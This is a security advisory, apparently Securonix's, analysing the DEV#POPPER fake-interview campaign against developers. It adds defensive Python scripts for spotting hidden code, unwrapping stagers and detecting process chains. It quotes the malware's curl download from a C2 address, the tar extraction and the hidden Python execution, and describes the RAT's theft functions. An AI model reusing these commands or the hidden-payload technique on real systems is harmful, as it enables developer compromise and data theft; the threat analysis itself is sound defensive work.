www.securonix.com
URL: https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-w...
Submission: On April 29 via api from TR — Scanned from DE
ANALYSIS OF DEV#POPPER: NEW ATTACK CAMPAIGN TARGETING SOFTWARE DEVELOPERS LIKELY ASSOCIATED WITH NORTH KOREAN THREAT ACTORS

Threat Research

SECURONIX THREAT RESEARCH SECURITY ADVISORY – FAST TRACK/EARLY-WARNING COVERAGE ADVISORY (FCA) EARLY DRAFT

BY SECURONIX THREAT RESEARCH: D. IUZVYK, T. PECK, O. KOLESNIKOV
Apr 24, 2024

TLDR: The Securonix Threat Research Team has been monitoring a new, ongoing social engineering attack campaign (tracked by STR as DEV#POPPER), likely associated with North Korean threat actors, that targets software developers with fake job interviews in order to deliver a Python-based RAT.

The Threat Research team has been investigating a new threat campaign (tracked by STR as DEV#POPPER) that targets software developers. STR has identified malicious software repositories used by the attackers as part of the campaign; below we examine them to understand how the threat actors infect systems and what their tooling is capable of.

Introduction

Social engineering is an advanced tactic used by threat actors to manipulate individuals into divulging confidential information or performing actions they normally would not. The attacker's goal is to trick the user into unknowingly compromising themselves or their place of employment.
Unlike traditional hacking methods, which rely on exploiting software, social engineering targets human vulnerabilities through psychological manipulation. It plays on basic human traits such as trust, fear, or the simple desire to be helpful.

In the DEV#POPPER campaign we have been observing, an interesting form of social engineering was noted: the targeting of a specific professional group, software developers. This technique, while not extremely prevalent at the moment, is still ongoing and has been reported a number of times in the past in connection with North Korean threat actors. In short, the attackers set up fake job interviews for developers, posing as legitimate interviewers. During these fraudulent interviews the developers are asked to perform tasks that involve downloading and running software from sources that appear legitimate, such as GitHub. The software contains a malicious Node.js payload that, once executed, compromises the developer's system.

This method is effective because it exploits the developer's professional engagement and trust in the job application process, where refusing the interviewer's requests could cost the job opportunity. The attackers tailor their approach to appear as credible as possible, often by mimicking real companies and replicating actual interview processes. This guise of professionalism and legitimacy lulls the target into a false sense of security, making it easier to deploy malware without arousing suspicion.

Note – At the time of publication, the attackers' GitHub repositories we analyze below had already been deleted. However, members of the cybersecurity community have picked up other GitHub-hosted samples as well.

STAGE 1: MALICIOUS NPM PACKAGE

The first stage involves downloading a zip archive from GitHub, the link to which the interviewer sends to the interviewee.
The zip archive contains a legitimate-looking Node Package Manager (NPM) package with a README.md and Frontend and Backend directories. Buried in the Backend directory is a single JavaScript file, imageDetails.js, which on the surface appears to be a simple code snippet using Mongoose, a Node.js package that provides MongoDB object modeling in an asynchronous environment.

Figure x: imageDetails.js – unusually long scroll bar

However, closer examination reveals a huge line of highly obfuscated code far to the right: the visible snippet is followed on the same line by a large comment block, and the payload sits beyond it, out of view in an editor. The scrollbar in the figure above gives a sense of how long the line is; the gif in the figure below shows the obfuscated code past the comment block.

Figure x: Video highlighting the malicious JavaScript code out of view

Removing the hidden JavaScript from imageDetails.js and placing it in its own file makes it easier to analyze. The code is obfuscated using several layers, including base64 encoding and variable substitution.

Figure x: Extracted obfuscated JavaScript code from imageDetails.js

STAGE 2: COMMAND EXECUTION AND PAYLOAD DOWNLOAD

When the victim eventually runs the malicious NPM package, the Stage 1 JavaScript executes inside the Node.js process (node.exe). Its purpose is simply to download an archive, extract it, and execute the next stage.
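As an added triage example for the Stage 1 hiding technique described above (this is not code from the Securonix write-up), the following Python script flags source lines that are far longer than an editor window and carry non-blank code after a long run of whitespace or a comment block, then lists the risky calls found in the hidden tail. The JavaScript sample inside it is a constructed stand-in for imageDetails.js, and the thresholds are assumptions; in practice you would point it at the Backend directory of an unpacked package before running npm install or node on it.

```python
import re
import sys

# Constructed stand-in for imageDetails.js: three ordinary Mongoose lines, the
# last of which continues, after 400 spaces and a comment, into an obfuscated
# payload that would sit far off-screen in an editor.
SAMPLE_JS = (
    "const mongoose = require('mongoose');\n"
    "const ImageSchema = new mongoose.Schema({ url: String });\n"
    "module.exports = mongoose.model('Image', ImageSchema);"
    + " " * 400
    + "/* generated, do not edit */ "
    + "(function(_0x4f2a){var _0x1b=Buffer.from('Y3VybCAtbyAuLi4=','base64');"
    + "require('child_process').exec(_0x1b.toString());})();\n"
)

# Calls that commonly appear in the hidden tail of such payloads.
SUSPICIOUS_CALLS = re.compile(
    r"\b(?:eval|Function|child_process|exec|execSync|spawn)\b"
    r"|Buffer\.from\([^)]*base64"
)


def find_hidden_code(source, max_visible=200, min_gap=80):
    """Return one finding per source line that hides code past a long gap.

    A line is reported when it is longer than `max_visible` characters (an
    assumed editor width) and contains a run of at least `min_gap` spaces/tabs
    or a block comment with non-blank code after it.  Each finding records the
    1-based line number, the column where the hidden code starts, the innocent
    looking prefix, a preview of the tail and the suspicious calls found in it.
    """
    gap = re.compile(r"[ \t]{%d,}|/\*.*?\*/" % min_gap, re.S)
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if len(line) <= max_visible:
            continue
        for m in gap.finditer(line):
            tail = line[m.end():]
            if not tail.strip():
                continue
            findings.append({
                "line": lineno,
                "hidden_from_col": m.end(),
                "visible_prefix": line[:m.start()].rstrip()[:80],
                "tail_preview": tail.strip()[:60],
                "indicators": sorted(set(SUSPICIOUS_CALLS.findall(tail))),
            })
            break  # one finding per line is enough for triage
    return findings


def scan_files(paths):
    """Run find_hidden_code over each path; returns {path: findings}."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            report[path] = find_hidden_code(fh.read())
    return report


if __name__ == "__main__":
    # With no arguments, scan the constructed sample; otherwise scan the files given.
    report = scan_files(sys.argv[1:]) if sys.argv[1:] else {"<sample>": find_hidden_code(SAMPLE_JS)}
    for path, hits in report.items():
        for f in hits:
            print(f"{path}:{f['line']}: hidden code from column {f['hidden_from_col']}"
                  f" after {f['visible_prefix']!r}; indicators={f['indicators']}")
```

The check deliberately keys on the layout trick rather than on the obfuscation itself: a minifier also produces very long lines, but it does not leave a short, readable statement followed by hundreds of characters of padding, so the gap requirement keeps bundled dependencies from flooding the report.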
Through the node.exe process we observed the following commands:

Command:
cmd.exe /d /s /c "curl -lo "C:\Users\[REDACTED]\AppData\Local\Temp\p.zi" "hxxp://147.124.214[.]131:1244/pdown"
Purpose: Download the next-stage payload, "p.zi", from the C2 server on port 1244.

Command:
tar -xf C:\Users\[REDACTED]\AppData\Local\Temp\p2.zip -c c:\users\[REDACTED]
Purpose: Using the built-in tar command, extract the archive into the user's profile directory (the target directory passed to tar), which is where the .pyp and .npl artifacts referenced in the next command end up.

Command:
cmd.exe /d /s /c ""c:\users\[REDACTED]\.pyp\python.exe" "c:\users\[REDACTED]\.npl""
Purpose: Run the bundled python.exe from the hidden .pyp directory and execute the hidden, extensionless file ".npl" that was just extracted.

STAGE 3: PYTHON CODE EXECUTION – .NPL

The ".npl" file is technically a Python script without an extension; its leading dot "." marks it as a hidden file, which may or may not be hidden from the user depending on their operating system settings. The file contains a large base64 payload and uses a combination of string manipulation and decoding to recover the Python code hidden inside it: the content behind the hidden string is base64-encoded and XOR-encoded, and the decoded result is executed with exec().

Figure x: Python execution .npl file contents

The decoded result contains several key variables, including its current path and a hard-coded C2 server: hxxp://147.124.214[.]131:1244. The script then calls and executes another Python script located at C:\Users\Redacted\.n2/pay.

STAGE 4: PYTHON CODE EXECUTION – PAY

The "pay" script is also an extensionless file, like the first Python script. It uses the same payload execution tactic, a base64 string decoded in the same fashion, but this time two distinct strings are decoded and executed. Each of these can be seen in the figure below.
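An added example, not the Securonix team's code and not the actual .npl or pay payload (which this page does not reproduce), of how a stager of the kind described under Stages 3 and 4 can be peeled statically rather than run: the script extracts the large string literal with Python's ast module, base64-decodes it, brute-forces a single-byte XOR key by scoring candidates for Python-looking text, and repeats while the result still ends in exec(). The STAGER inside it is a constructed mock built in the same base64-then-XOR-then-exec() style, with an assumed key, a junk prefix standing in for the "string manipulation" step, and a placeholder C2 address; a real sample with a multi-byte key or a different string transform would need the key search and the literal extraction adjusted.

```python
import ast
import base64
import re
import string

# --- Constructed mock of a .npl/pay-style stager (an assumption, not the real file) ---
INNER_SCRIPT = (
    "import os, platform\n"
    "C2 = 'http://192.0.2.10:1244'\n"   # placeholder address, not the real C2
    "uuid = os.getenv('USERNAME')\n"
    "print(platform.node(), uuid, C2)\n"
)
XOR_KEY = 0x5A  # assumed single-byte key


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


# What the stager looks like on disk: one large string literal, a slicing step
# that strips a junk prefix, XOR with a constant, then exec() of the result.
_blob = base64.b64encode(xor_bytes(INNER_SCRIPT.encode(), XOR_KEY)).decode()
STAGER = "\n".join([
    "import base64",
    "_b = 'JUNK' + '%s'" % _blob,
    "exec(bytes(c ^ %d for c in base64.b64decode(_b[4:])).decode())" % XOR_KEY,
]) + "\n"

# --- Static unwrapper ---
PY_HINTS = re.compile(r"\b(?:import|def|exec|eval|socket|subprocess|os|sys|open)\b")
IOC_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?")


def python_score(blob):
    """-1 if not printable text, otherwise how many Python-ish keywords it contains."""
    try:
        text = blob.decode("utf-8")
    except UnicodeDecodeError:
        return -1
    if any(ch not in string.printable for ch in text):
        return -1
    return len(PY_HINTS.findall(text))


def longest_string_literal(src):
    """The biggest str constant in the source: in these stagers, that is the payload."""
    consts = [n.value for n in ast.walk(ast.parse(src))
              if isinstance(n, ast.Constant) and isinstance(n.value, str)]
    return max(consts, key=len, default="")


def unwrap_stager(src, max_layers=5):
    """Peel base64 + single-byte-XOR + exec() layers without executing any of them.

    Returns a list of {"key", "code", "iocs"} dicts, outermost layer first.
    """
    layers = []
    current = src
    for _ in range(max_layers):
        literal = longest_string_literal(current)
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:
            break
        # Pick the key whose output looks most like Python source (key 0 covers "no XOR").
        key = max(range(256), key=lambda k: python_score(xor_bytes(raw, k)))
        plain = xor_bytes(raw, key)
        if python_score(plain) <= 0:
            break
        current = plain.decode()
        layers.append({"key": key, "code": current, "iocs": IOC_RE.findall(current)})
        if not re.search(r"\b(?:exec|eval)\s*\(", current):
            break  # reached the real payload, nothing further to peel
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(unwrap_stager(STAGER), start=1):
        print(f"layer {depth}: xor key 0x{layer['key']:02x}, iocs={layer['iocs']}")
        print(layer["code"])
```

Scoring decoded candidates for printable, keyword-bearing text is what makes the key search safe to automate: nothing from the sample is ever executed, so the C2 address and the next-stage path fall out of the decoded text without the script having to reach the network or touch the .n2 directory.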
Figure x: res – Python file contents

The first decoded string gathers system and network information from the infected computer and sends it to a remote server. The data includes:
* Operating system type
* Hostname
* OS release version
* OS version
* Username of the logged-in user
* A unique identifier for the device (uuid), generated by hashing the MAC address and username

This information is transmitted in a JSON-like format to the attacker's C2 server in a carefully crafted HTTP POST request.

The second decoded string is much longer than the first and contains considerably more functionality. Once executed, it functions as a RAT (Remote Access Trojan), allowing the attacker to interact with the victim's machine remotely. After analyzing the decoded portion of the script, we observed the following capabilities:
* Networking and session creation: Establishes persistent TCP connections to the C2, including structuring and sending JSON-formatted data.
* File system interaction: Contains functions to traverse directories and filter files by extension, with a list of directories to exclude. It can also locate and potentially exfiltrate files that do not match certain criteria (such as file size and extension).
* Remote command execution: Several functions allow execution of system shell commands and scripts, including browsing the file system and running shell commands.
* Data handling and transmission: Encodes data for transmission over the established TCP connection, handles data reception, decodes different character encodings, and manages transmission errors and timeouts.
* Exfiltration and uploading: The script can send files to a remote FTP server, filtering files in or out by extension.
Other functions help automate this process by collecting data from user directories such as Documents and Downloads.
* Clipboard and keystroke logging: The script includes capabilities to monitor and exfiltrate clipboard contents and keystrokes.

SECURONIX RECOMMENDATIONS

When it comes to attacks that originate through social engineering, it is critical to maintain a security-focused mindset, especially in intense and stressful situations such as job interviews. The attackers behind the DEV#POPPER campaign abuse this, knowing that the person on the other end is distracted and in a much more vulnerable state.

For prevention and detection, the Securonix Threat Research team recommends:
* Raise awareness that people are targets of social engineering just as technology is a target of exploitation. Remaining vigilant and security-conscious, even in high-stress situations, is critical to preventing the issue altogether.
* Monitor common malware staging directories for code execution, especially script-related activity in world-writable directories. In this campaign the threat actors staged in the user's AppData\Local\Temp directory and in hidden subdirectories of the user's profile (the .pyp and .n2 directories seen above).
* Monitor for the use of non-default scripting languages such as Python on endpoints and servers that should not normally execute them. To assist with this, enable additional process-level logging such as Sysmon and PowerShell logging for broader detection coverage.
* Securonix customers can scan endpoints using the Securonix hunting queries below.
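To make the endpoint recommendations concrete, here is an added example (not from the Securonix advisory and not its hunting queries) that encodes the process chain seen in Stage 2 as rules over Sysmon-style process-creation records: node.exe spawning a downloader or archiver, python.exe running from under the user's profile, a dot-prefixed hidden path on the command line, and the campaign's C2 addresses or port from the IOC section. The events are constructed, the field names are simplified, and the exclusion for per-user Python installs under AppData\Local\Programs is an assumption made to reduce false positives.

```python
import ntpath
import re

# IOCs taken from the advisory's C2 section; the port is the one seen in Stage 2.
C2_ADDRESSES = {"147.124.214.131", "173.211.106.101"}
C2_PORT = 1244

# Constructed Sysmon-style process-creation records (not real telemetry).
# Events 2-4 mirror the Stage 2 chain; 1, 5 and 6 are ordinary developer noise.
EVENTS = [
    {"id": 1, "image": r"C:\Program Files\nodejs\node.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'node "C:\Users\dev\sports_platform_app-main\Backend\server.js"'},
    {"id": 2, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Program Files\nodejs\node.exe",
     "cmdline": r'cmd.exe /d /s /c "curl -lo "C:\Users\dev\AppData\Local\Temp\p.zi" "http://147.124.214.131:1244/pdown"'},
    {"id": 3, "image": r"C:\Windows\System32\tar.exe", "parent": r"C:\Program Files\nodejs\node.exe",
     "cmdline": r"tar -xf C:\Users\dev\AppData\Local\Temp\p2.zip -C c:\users\dev"},
    {"id": 4, "image": r"C:\Users\dev\.pyp\python.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"c:\users\dev\.pyp\python.exe" "c:\users\dev\.npl"'},
    {"id": 5, "image": r"C:\Users\dev\AppData\Local\Programs\Python\Python312\python.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"python manage.py runserver"},
    {"id": 6, "image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"curl -sSLo deps.zip https://github.com/example/repo/archive/main.zip"},
]

DOWNLOADER = re.compile(r"\b(?:curl|wget|tar|certutil|bitsadmin|Invoke-WebRequest)\b", re.I)
# A dot-prefixed (hidden) path component directly under a user profile, e.g. C:\Users\x\.pyp
HIDDEN_UNDER_PROFILE = re.compile(r"[a-z]:\\users\\[^\\]+\\\.[^\\\s\"]+", re.I)
USER_PROFILE = re.compile(r"^[a-z]:\\users\\", re.I)
PER_USER_INSTALL = re.compile(r"\\AppData\\Local\\Programs\\", re.I)  # assumed benign location


def basename(path):
    return ntpath.basename(path).lower()


def rule_node_spawns_downloader(ev):
    """node.exe launching curl/tar/etc. (plain npm scripts spawn cmd.exe too, hence the keyword check)."""
    return basename(ev["parent"]) == "node.exe" and DOWNLOADER.search(ev["cmdline"]) is not None


def rule_python_from_user_profile(ev):
    """An interpreter executing from the user's profile rather than a normal install path."""
    img = ev["image"]
    return (basename(img) == "python.exe"
            and USER_PROFILE.search(img) is not None
            and PER_USER_INSTALL.search(img) is None)


def rule_hidden_dotfile_in_cmdline(ev):
    """Any dot-prefixed path directly under a profile (.pyp, .npl, .n2) on a command line."""
    return HIDDEN_UNDER_PROFILE.search(ev["cmdline"]) is not None


def rule_c2_ioc_in_cmdline(ev):
    cmd = ev["cmdline"]
    return any(ip in cmd for ip in C2_ADDRESSES) or re.search(r":%d\b" % C2_PORT, cmd) is not None


RULES = {
    "node_spawns_downloader": rule_node_spawns_downloader,
    "python_from_user_profile": rule_python_from_user_profile,
    "hidden_dotfile_in_cmdline": rule_hidden_dotfile_in_cmdline,
    "c2_ioc_in_cmdline": rule_c2_ioc_in_cmdline,
}


def detect(events):
    """Map event id -> sorted list of rule names that fired; silent events are omitted."""
    hits = {}
    for ev in events:
        fired = sorted(name for name, rule in RULES.items() if rule(ev))
        if fired:
            hits[ev["id"]] = fired
    return hits


if __name__ == "__main__":
    for event_id, rules in detect(EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

The IOC rule is the only one that expires with the infrastructure; the other three describe the behaviour (a Node process fetching and unpacking an archive, then a private copy of Python running a hidden extensionless file) and will keep matching when the addresses change. Tune the profile-path exclusion to the interpreters your developers legitimately install per user before deploying anything like this.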
MITRE ATT&CK MATRIX

Tactic: Collection
* T1560: Archive Collected Data
Tactic: Command and Control
* T1132: Data Encoding
Tactic: Defense Evasion
* T1027.010: Obfuscated Files or Information: Command Obfuscation
* T1070.004: Indicator Removal: File Deletion
Tactic: Discovery
* T1033: System Owner/User Discovery
* T1082: System Information Discovery
Tactic: Execution
* T1059.001: Command and Scripting Interpreter: PowerShell
* T1059.003: Command and Scripting Interpreter: Windows Command Shell
* T1059.006: Command and Scripting Interpreter: Python
Tactic: Exfiltration
* T1041: Exfiltration Over C2 Channel

RELEVANT PROVISIONAL SECURONIX DETECTIONS
* EDR-ALL-930-RU
* EDR-ALL-1246-RU
* NGF-ALL-833-ER

RELEVANT HUNTING QUERIES (REMOVE SQUARE BRACKETS "[ ]" FOR IP ADDRESSES OR URLS)
* index = activity AND rg_functionality = "Web Proxy" AND (destinationaddress = "147.124.214[.]131" OR destinationaddress = "173.211.106[.]101")
* index = activity AND rg_functionality = "Next Generation Firewall" AND (destinationaddress = "147.124.214[.]131" OR destinationaddress = "173.211.106[.]101")
* index = activity AND rg_functionality = "Endpoint Management Systems" AND (deviceaction = "Network connection detected" OR deviceaction = "Network connection detected (rule: NetworkConnect)") AND destinationport = "1244"
* index = activity AND rg_functionality = "Endpoint Management Systems" AND (deviceaction = "Process Create" OR deviceaction = "Process Create (rule: ProcessCreate)" OR deviceaction = "ProcessRollup2" OR deviceaction = "Procstart" OR deviceaction = "Process" OR deviceaction = "Trace Executed Process") AND destinationprocessname ENDS WITH "python.exe" AND (sourceprocessname ENDS WITH "cmd.exe" OR sourceprocessname ENDS WITH "powershell.exe")

Note on the last query: it looks for python.exe launched by cmd.exe or PowerShell, as in the Stage 2 command chain. The parent must be matched with the source-process field; a single destinationprocessname cannot end with both "python.exe" and "cmd.exe", so a query that puts both clauses on the child process never returns results.

C2 AND INFRASTRUCTURE

C2 Address
* 147.124.214[.]131
* 173.211.106[.]101

ANALYZED FILES/HASHES

File Name: sports_platform_app-main.zip
SHA256: 45c991529a421104f2edf03d92e01d95774bf54325f9107dd4139505912a0c1e

File Name: imageDetails.js
SHA256: 33617F0AC01A0F7FA5F64BD8EDEF737F678C44E677E4A2FB23C6B8A3BCD39FA2

File Name: .npl
SHA256: F9CA12321FB91157CCE8513E935810D1C2005AB0739322B474F0CB4AF2605D16

File Name: pay
SHA256: 977A9024962102B02128D391C0543C63328D3F26701ECA1A5D282AF4D493DC2E

REFERENCES
1. Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors. https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/